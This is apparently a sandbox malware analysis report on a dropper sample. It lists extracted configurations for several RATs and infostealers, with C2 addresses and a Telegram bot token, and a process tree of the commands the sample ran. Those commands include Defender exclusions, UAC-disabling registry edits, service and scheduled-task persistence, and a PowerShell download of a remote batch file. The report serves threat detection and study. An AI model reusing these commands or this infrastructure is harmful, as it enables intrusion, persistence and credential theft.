Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Resubmissions

12/12/2024, 18:20

241212-wy4dxsvkcp 10

12/12/2024, 18:03

241212-wnfvwatqgp 10

28/11/2024, 00:38

241128-ay5fbstmfp 10

Analysis

  • max time kernel
    299s
  • max time network
    302s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    12/12/2024, 18:03

General

  • Target

    4363463463464363463463463.exe

  • Size

    10KB

  • MD5

    2a94f3960c58c6e70826495f76d00b85

  • SHA1

    e2a1a5641295f5ebf01a37ac1c170ac0814bb71a

  • SHA256

    2fcad226b17131da4274e1b9f8f31359bdd325c9568665f08fd1f6c5d06a23ce

  • SHA512

    fbf55b55fcfb12eb8c029562956229208b9e8e2591859d6336c28a590c92a4d0f7033a77c46ef6ebe07ddfca353aba1e84b51907cd774beab148ee901c92d62f

  • SSDEEP

    192:xlwayyHOXGc20L7BIW12n/ePSjiTlzkGu8stYcFwVc03KY:xlwwHe/20PKn/cLTlHuptYcFwVc03K

Malware Config

Extracted

Family

quasar

Version

1.4.1

Botnet

sigorta

C2

18.198.25.148:1604

Mutex

af7e773d-541a-46fd-87d3-06bb0a26aab9

Attributes
  • encryption_key

    D306945220105109C86E6E257D749CE885E76091

  • install_name

    Client.exe

  • log_directory

    Logs

  • reconnect_delay

    3000

  • startup_key

    Quasar Client Startup

  • subdirectory

    SubDir

Extracted

Family

xworm

Version

5.0

C2

ms-pupils.gl.at.ply.gg:42890

Mutex

xIgEZvOsUNiy7Htf

Attributes
  • Install_directory

    %AppData%

  • install_file

    svchost.exe

aes.plain

Extracted

Family

redline

Botnet

newbundle2

C2

185.215.113.67:15206

Extracted

Family

lumma

C2

https://servicedny.site/api

https://authorisev.site/api

https://faulteyotk.site/api

https://dilemmadu.site/api

https://contemteny.site/api

https://goalyfeastz.site/api

https://opposezmny.site/api

https://seallysl.site/api

https://thighpecr.cyou/api

Extracted

Family

stealc

Botnet

default

C2

http://185.215.113.17

Attributes
  • url_path

    /2fb6c2cc8dce150a.php

Extracted

Family

asyncrat

Version

0.5.8

Botnet

Default

C2

18.ip.gl.ply.gg:6606

18.ip.gl.ply.gg:7707

18.ip.gl.ply.gg:8808

18.ip.gl.ply.gg:9028

ser.nrovn.xyz:6606

ser.nrovn.xyz:7707

ser.nrovn.xyz:8808

Mutex

lmk8StbxTzvz

Attributes
  • delay

    3

  • install

    true

  • install_file

    Discord.exe

  • install_folder

    %AppData%

aes.plain
aes.plain

Extracted

Family

asyncrat

Version

Venom RAT + HVNC + Stealer + Grabber v6.0.2

Botnet

Default

C2

47.238.55.14:4449

Mutex

rqwcncaesrdtlckoweu

Attributes
  • delay

    1

  • install

    false

  • install_folder

    %AppData%

aes.plain

Extracted

Family

stealc

Botnet

7140196255

C2

http://83.217.209.11

Attributes
  • url_path

    /fd2453cf4b7dd4a4.php

Extracted

Family

gurcu

C2

https://api.telegram.org/bot962023231:AAG4by19NbHDMl2hPuMLesCOvrR264-4hSg/sendMessag

Signatures

  • AsyncRat

    AsyncRAT is designed to remotely monitor and control other computers written in C#.

  • Asyncrat family
  • Detect Xworm Payload 2 IoCs
  • Gurcu family
  • Gurcu, WhiteSnake

    Gurcu aka WhiteSnake is a malware stealer written in C#.

  • Lumma Stealer, LummaC

    Lumma or LummaC is an infostealer written in C++ first seen in August 2022.

  • Lumma family
  • Phorphiex family
  • Phorphiex payload 1 IoCs
  • Phorphiex, Phorpiex

    Phorphiex or Phorpiex Malware family which infects systems to distribute other malicious payloads such as ransomware, stealers and cryptominers.

  • Quasar RAT

    Quasar is an open source Remote Access Tool.

  • Quasar family
  • Quasar payload 2 IoCs
  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine payload 2 IoCs
  • Redline family
  • Stealc

    Stealc is an infostealer written in C++.

  • Stealc family
  • Suspicious use of NtCreateUserProcessOtherParentProcess 7 IoCs
  • UAC bypass 3 TTPs 6 IoCs
  • Xmrig family
  • Xworm

    Xworm is a remote access trojan written in C#.

  • Xworm family
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • Async RAT payload 2 IoCs
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs
  • XMRig Miner payload 1 IoCs
  • Adds policy Run key to start application 2 TTPs 6 IoCs
  • Blocklisted process makes network request 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 19 IoCs

    Using powershell.exe command.

  • Creates new service(s) 2 TTPs
  • Downloads MZ/PE file
  • Modifies Windows Firewall 2 TTPs 1 IoCs
  • Server Software Component: Terminal Services DLL 1 TTPs 2 IoCs
  • Sets file to hidden 1 TTPs 1 IoCs

    Modifies file attributes to stop it showing in Explorer etc.

  • Stops running service(s) 4 TTPs
  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 15 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 8 IoCs
  • Executes dropped EXE 64 IoCs
  • Loads dropped DLL 64 IoCs
  • Reads data files stored by FTP clients 2 TTPs

    Tries to access configuration files associated with programs like FileZilla.

  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Unsecured Credentials: Credentials In Files 1 TTPs

    Steal credentials from unsecured files.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 10 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 1 IoCs
  • Indicator Removal: Clear Persistence 1 TTPs 1 IoCs

    Clear artifacts associated with previously established persistence like scheduletasks on a host.

  • Indicator Removal: File Deletion 1 TTPs

    Adversaries may delete files left behind by the actions of their intrusion activity.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 15 IoCs
  • Looks up external IP address via web service 5 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • AutoIT Executable 5 IoCs

    AutoIT scripts compiled to PE executables.

  • Drops autorun.inf file 1 TTPs 5 IoCs

    Malware can abuse Windows Autorun to spread further via attached volumes.

  • Drops file in System32 directory 56 IoCs
  • Enumerates processes with tasklist 1 TTPs 4 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
  • Suspicious use of SetThreadContext 7 IoCs
  • UPX packed file 11 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Drops file in Windows directory 8 IoCs
  • Launches sc.exe 6 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Access Token Manipulation: Create Process with Token 1 TTPs 1 IoCs
  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Detects Pyinstaller 2 IoCs
  • Embeds OpenSSL 4 IoCs

    Embeds OpenSSL, may be used to circumvent TLS interception.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • Program crash 2 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks processor information in registry 2 TTPs 6 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 11 IoCs
  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 1 IoCs
  • Modifies registry key 1 TTPs 5 IoCs
  • Modifies system certificate store 2 TTPs 2 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 5 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 2 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 7 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 47 IoCs
  • Suspicious use of SendNotifyMessage 41 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • Views/modifies file attributes 1 TTPs 1 IoCs

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
      PID:3632
      • C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe
        "C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe"
        2⤵
        • Checks computer location settings
        • System Location Discovery: System Language Discovery
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2900
        • C:\Users\Admin\AppData\Local\Temp\Files\pyld64.exe
          "C:\Users\Admin\AppData\Local\Temp\Files\pyld64.exe"
          3⤵
          • Executes dropped EXE
          • Drops file in System32 directory
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of WriteProcessMemory
          PID:4428
          • C:\Windows\SYSTEM32\cmd.exe
            cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows\System32'"
            4⤵
            • Suspicious use of WriteProcessMemory
            PID:4140
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows\System32'"
              5⤵
              • Command and Scripting Interpreter: PowerShell
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:4284
          • C:\Windows\SYSTEM32\cmd.exe
            cmd.exe /c start "" "C:\Windows\System32\usvcinsta64.exe"
            4⤵
            • Suspicious use of WriteProcessMemory
            PID:920
            • C:\Windows\System32\usvcinsta64.exe
              "C:\Windows\System32\usvcinsta64.exe"
              5⤵
              • Executes dropped EXE
              • Suspicious use of WriteProcessMemory
              PID:3616
              • C:\Windows\System32\cmd.exe
                cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows\System32'"
                6⤵
                • Suspicious use of WriteProcessMemory
                PID:832
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows\System32'"
                  7⤵
                  • Command and Scripting Interpreter: PowerShell
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:2680
              • C:\Windows\System32\cmd.exe
                cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows \System32'"
                6⤵
                • Suspicious use of WriteProcessMemory
                PID:4440
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows \System32'"
                  7⤵
                  • Command and Scripting Interpreter: PowerShell
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:4236
              • C:\Windows\System32\cmd.exe
                cmd.exe /c mkdir "\\?\C:\Windows \System32"
                6⤵
                  PID:4536
                • C:\Windows\System32\cmd.exe
                  cmd.exe /c start "" "C:\Windows \System32\printui.exe"
                  6⤵
                  • Suspicious use of WriteProcessMemory
                  PID:4948
                  • C:\Windows \System32\printui.exe
                    "C:\Windows \System32\printui.exe"
                    7⤵
                    • Executes dropped EXE
                    • Loads dropped DLL
                    • Drops file in System32 directory
                    • Suspicious use of WriteProcessMemory
                    PID:3184
                    • C:\Windows\SYSTEM32\cmd.exe
                      cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath '%SystemDrive%\Windows \System32'; Add-MpPreference -ExclusionPath '%SystemDrive%\Windows\System32';"
                      8⤵
                      • Suspicious use of WriteProcessMemory
                      PID:2416
                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows \System32'; Add-MpPreference -ExclusionPath 'C:\Windows\System32';"
                        9⤵
                        • Command and Scripting Interpreter: PowerShell
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        PID:3336
                    • C:\Windows\SYSTEM32\cmd.exe
                      cmd.exe /c sc create x670435 binPath= "C:\Windows\System32\svchost.exe -k DcomLaunch" type= own start= auto && reg add HKLM\SYSTEM\CurrentControlSet\services\x670435\Parameters /v ServiceDll /t REG_EXPAND_SZ /d "C:\Windows\System32\x670435.dat" /f && sc start x670435
                      8⤵
                      • Suspicious use of WriteProcessMemory
                      PID:1064
                      • C:\Windows\system32\sc.exe
                        sc create x670435 binPath= "C:\Windows\System32\svchost.exe -k DcomLaunch" type= own start= auto
                        9⤵
                        • Launches sc.exe
                        PID:4892
                      • C:\Windows\system32\reg.exe
                        reg add HKLM\SYSTEM\CurrentControlSet\services\x670435\Parameters /v ServiceDll /t REG_EXPAND_SZ /d "C:\Windows\System32\x670435.dat" /f
                        9⤵
                        • Server Software Component: Terminal Services DLL
                        • Modifies registry key
                        PID:4612
                      • C:\Windows\system32\sc.exe
                        sc start x670435
                        9⤵
                        • Launches sc.exe
                        PID:3200
                    • C:\Windows\SYSTEM32\cmd.exe
                      cmd.exe /c start "" "C:\Windows\System32\console_zero.exe"
                      8⤵
                      • Suspicious use of WriteProcessMemory
                      PID:2948
                      • C:\Windows\System32\console_zero.exe
                        "C:\Windows\System32\console_zero.exe"
                        9⤵
                        • Executes dropped EXE
                        • Loads dropped DLL
                        • Suspicious use of WriteProcessMemory
                        PID:4696
                        • C:\Windows\System32\cmd.exe
                          cmd.exe /c schtasks /delete /tn "console_zero" /f
                          10⤵
                          • Indicator Removal: Clear Persistence
                          • Suspicious use of WriteProcessMemory
                          PID:1368
                          • C:\Windows\system32\schtasks.exe
                            schtasks /delete /tn "console_zero" /f
                            11⤵
                              PID:3280
                          • C:\Windows\System32\cmd.exe
                            cmd.exe /c schtasks /create /tn "console_zero" /sc ONLOGON /tr "C:\Windows\System32\console_zero.exe" /rl HIGHEST /f
                            10⤵
                            • Suspicious use of WriteProcessMemory
                            PID:3620
                            • C:\Windows\system32\schtasks.exe
                              schtasks /create /tn "console_zero" /sc ONLOGON /tr "C:\Windows\System32\console_zero.exe" /rl HIGHEST /f
                              11⤵
                              • Scheduled Task/Job: Scheduled Task
                              PID:4144
                      • C:\Windows\SYSTEM32\cmd.exe
                        cmd.exe /c timeout /t 10 /nobreak && rmdir /s /q "C:\Windows \"
                        8⤵
                        • Suspicious use of WriteProcessMemory
                        PID:832
                        • C:\Windows\system32\timeout.exe
                          timeout /t 10 /nobreak
                          9⤵
                          • Delays execution with timeout.exe
                          PID:3612
                  • C:\Windows\System32\cmd.exe
                    cmd.exe /c timeout /t 10 /nobreak && del "C:\Windows\System32\usvcinsta64.exe"
                    6⤵
                    • Suspicious use of WriteProcessMemory
                    PID:2300
                    • C:\Windows\system32\timeout.exe
                      timeout /t 10 /nobreak
                      7⤵
                      • Delays execution with timeout.exe
                      PID:4616
              • C:\Windows\SYSTEM32\cmd.exe
                cmd.exe /c timeout /t 10 /nobreak && del "C:\Users\Admin\AppData\Local\Temp\Files\pyld64.exe"
                4⤵
                • Suspicious use of WriteProcessMemory
                PID:2120
                • C:\Windows\system32\timeout.exe
                  timeout /t 10 /nobreak
                  5⤵
                  • Delays execution with timeout.exe
                  PID:4968
            • C:\Users\Admin\AppData\Local\Temp\Files\aa.exe
              "C:\Users\Admin\AppData\Local\Temp\Files\aa.exe"
              3⤵
              • Executes dropped EXE
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of FindShellTrayWindow
              • Suspicious use of SendNotifyMessage
              PID:3624
            • C:\Users\Admin\AppData\Local\Temp\Files\test22.exe
              "C:\Users\Admin\AppData\Local\Temp\Files\test22.exe"
              3⤵
              • Executes dropped EXE
              PID:4236
            • C:\Users\Admin\AppData\Local\Temp\Files\stealinfo.exe
              "C:\Users\Admin\AppData\Local\Temp\Files\stealinfo.exe"
              3⤵
              • Executes dropped EXE
              PID:1460
              • C:\Users\Admin\AppData\Local\Temp\Files\stealinfo.exe
                "C:\Users\Admin\AppData\Local\Temp\Files\stealinfo.exe"
                4⤵
                • Executes dropped EXE
                • Loads dropped DLL
                • Suspicious use of FindShellTrayWindow
                PID:2132
            • C:\Users\Admin\AppData\Local\Temp\Files\pornhub_downloader.exe
              "C:\Users\Admin\AppData\Local\Temp\Files\pornhub_downloader.exe"
              3⤵
              • Checks computer location settings
              • Executes dropped EXE
              PID:2372
              • C:\Windows\system32\cmd.exe
                "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\1DB.tmp\1DC.tmp\1DD.bat C:\Users\Admin\AppData\Local\Temp\Files\pornhub_downloader.exe"
                4⤵
                  PID:4816
                  • C:\Windows\system32\mshta.exe
                    mshta vbscript:createobject("shell.application").shellexecute("C:\Users\Admin\AppData\Local\Temp\Files\PORNHU~1.EXE","goto :target","","runas",1)(window.close)
                    5⤵
                    • Checks computer location settings
                    • Access Token Manipulation: Create Process with Token
                    PID:692
                    • C:\Users\Admin\AppData\Local\Temp\Files\PORNHU~1.EXE
                      "C:\Users\Admin\AppData\Local\Temp\Files\PORNHU~1.EXE" goto :target
                      6⤵
                      • Checks computer location settings
                      • Executes dropped EXE
                      • System Location Discovery: System Language Discovery
                      PID:3944
                      • C:\Windows\system32\cmd.exe
                        "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\46B.tmp\46C.tmp\46D.bat C:\Users\Admin\AppData\Local\Temp\Files\PORNHU~1.EXE goto :target"
                        7⤵
                          PID:2884
                          • C:\Windows\system32\reg.exe
                            reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "ConsentPromptBehaviorAdmin" /t reg_dword /d 0 /F
                            8⤵
                            • UAC bypass
                            PID:808
                          • C:\Windows\system32\reg.exe
                            reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "EnableLUA" /t reg_dword /d 0 /F
                            8⤵
                            • UAC bypass
                            PID:2300
                          • C:\Windows\system32\reg.exe
                            reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "PromptOnSecureDesktop" /t reg_dword /d 0 /F
                            8⤵
                            • UAC bypass
                            PID:3920
                          • C:\Windows\system32\cmd.exe
                            C:\Windows\system32\cmd.exe /c "reg query HKEY_CLASSES_ROOT\http\shell\open\command"
                            8⤵
                              PID:4428
                              • C:\Windows\system32\reg.exe
                                reg query HKEY_CLASSES_ROOT\http\shell\open\command
                                9⤵
                                  PID:1304
                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.pornhub.com/
                                8⤵
                                • Enumerates system info in registry
                                • Suspicious behavior: EnumeratesProcesses
                                • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                                • Suspicious use of FindShellTrayWindow
                                • Suspicious use of SendNotifyMessage
                                PID:1048
                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x120,0x124,0x128,0xfc,0x12c,0x7ffc9e9646f8,0x7ffc9e964708,0x7ffc9e964718
                                  9⤵
                                    PID:4196
                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1940,2290917403197833340,17167679874739860858,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1988 /prefetch:2
                                    9⤵
                                      PID:4560
                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1940,2290917403197833340,17167679874739860858,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2224 /prefetch:3
                                      9⤵
                                      • Suspicious behavior: EnumeratesProcesses
                                      PID:1364
                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1940,2290917403197833340,17167679874739860858,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2620 /prefetch:8
                                      9⤵
                                        PID:4220
                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1940,2290917403197833340,17167679874739860858,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3356 /prefetch:1
                                        9⤵
                                          PID:1028
                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1940,2290917403197833340,17167679874739860858,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3372 /prefetch:1
                                          9⤵
                                            PID:3720
                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1940,2290917403197833340,17167679874739860858,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4852 /prefetch:1
                                            9⤵
                                              PID:1916
                                            • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
                                              "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1940,2290917403197833340,17167679874739860858,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5352 /prefetch:8
                                              9⤵
                                                PID:4948
                                              • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
                                                "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1940,2290917403197833340,17167679874739860858,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5352 /prefetch:8
                                                9⤵
                                                • Suspicious behavior: EnumeratesProcesses
                                                PID:3616
                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1940,2290917403197833340,17167679874739860858,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5360 /prefetch:1
                                                9⤵
                                                  PID:208
                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1940,2290917403197833340,17167679874739860858,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5432 /prefetch:1
                                                  9⤵
                                                    PID:832
                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1940,2290917403197833340,17167679874739860858,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5760 /prefetch:1
                                                    9⤵
                                                      PID:2496
                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1940,2290917403197833340,17167679874739860858,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5416 /prefetch:1
                                                      9⤵
                                                        PID:5064
                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1940,2290917403197833340,17167679874739860858,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2104 /prefetch:2
                                                        9⤵
                                                          PID:5664
                                                      • C:\Windows\system32\attrib.exe
                                                        attrib +s +h d:\net
                                                        8⤵
                                                        • Sets file to hidden
                                                        • Views/modifies file attributes
                                                        PID:664
                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        powershell -c "invoke-webrequest -uri http://206.217.142.166:1234/windows/v2/dr.bat -outfile d:\net\dr\dr.bat"
                                                        8⤵
                                                        • Blocklisted process makes network request
                                                        • Command and Scripting Interpreter: PowerShell
                                                        • Suspicious behavior: EnumeratesProcesses
                                                        • Suspicious use of AdjustPrivilegeToken
                                                        PID:4012
                                                      • C:\Windows\system32\schtasks.exe
                                                        SchTasks /Create /SC ONLOGON /TN "my dr" /TR "d:\net\dr\dr.bat" /f
                                                        8⤵
                                                        • Scheduled Task/Job: Scheduled Task
                                                        PID:5612
                                            • C:\Users\Admin\AppData\Local\Temp\Files\twztl.exe
                                              "C:\Users\Admin\AppData\Local\Temp\Files\twztl.exe"
                                              3⤵
                                              • Executes dropped EXE
                                              • Adds Run key to start application
                                              • Drops file in Windows directory
                                              PID:3280
                                              • C:\Windows\sysnldcvmr.exe
                                                C:\Windows\sysnldcvmr.exe
                                                4⤵
                                                • Executes dropped EXE
                                                • System Location Discovery: System Language Discovery
                                                PID:3436
                                                • C:\Users\Admin\AppData\Local\Temp\236662000.exe
                                                  C:\Users\Admin\AppData\Local\Temp\236662000.exe
                                                  5⤵
                                                  • Checks computer location settings
                                                  • Executes dropped EXE
                                                  • Suspicious behavior: EnumeratesProcesses
                                                  • Suspicious use of AdjustPrivilegeToken
                                                  PID:5384
                                                  • C:\Windows\System32\cmd.exe
                                                    "C:\Windows\System32\cmd.exe" /c reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f
                                                    6⤵
                                                      PID:5440
                                                      • C:\Windows\system32\reg.exe
                                                        reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f
                                                        7⤵
                                                          PID:5528
                                                      • C:\Windows\System32\cmd.exe
                                                        "C:\Windows\System32\cmd.exe" /c schtasks /delete /f /tn "Windows Upgrade Manager"
                                                        6⤵
                                                          PID:5476
                                                          • C:\Windows\system32\schtasks.exe
                                                            schtasks /delete /f /tn "Windows Upgrade Manager"
                                                            7⤵
                                                              PID:5548
                                                        • C:\Users\Admin\AppData\Local\Temp\2134822717.exe
                                                          C:\Users\Admin\AppData\Local\Temp\2134822717.exe
                                                          5⤵
                                                          • Executes dropped EXE
                                                          • System Location Discovery: System Language Discovery
                                                          PID:2872
                                                          • C:\Users\Admin\AppData\Local\Temp\2986912876.exe
